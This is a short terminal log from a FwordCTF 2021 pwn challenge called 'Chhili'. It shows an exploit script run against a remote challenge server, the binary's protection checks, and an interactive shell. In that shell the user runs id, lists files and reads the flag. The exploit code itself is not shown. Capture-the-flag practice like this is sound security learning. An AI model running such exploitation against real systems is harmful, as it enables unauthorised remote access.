mito@ubuntu:~/CTF/FwordCTF_2021/Pwn_Chhili$ python3 solve.py r
[*] '/home/mito/CTF/FwordCTF_2021/Pwn_Chhili/chhili'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 40.71.72.198 on port 1234: Done
[*] Switching to interactive mode
$ id
uid=1000(fword) gid=1000(fword) groups=1000(fword)
$ ls -l
total 44
-rwxrwxr-x 1 root root 17664 Aug 27 16:14 chhili
-rw-rw-r-- 1 root root    52 Aug 27 16:14 flag.txt
-rwxrwxr-x 1 root root 18744 Aug 27 16:14 ynetd
$ cat flag.txt
FwordCTF{th1s_will_b3_your_f1rSt_st3p_481364972164}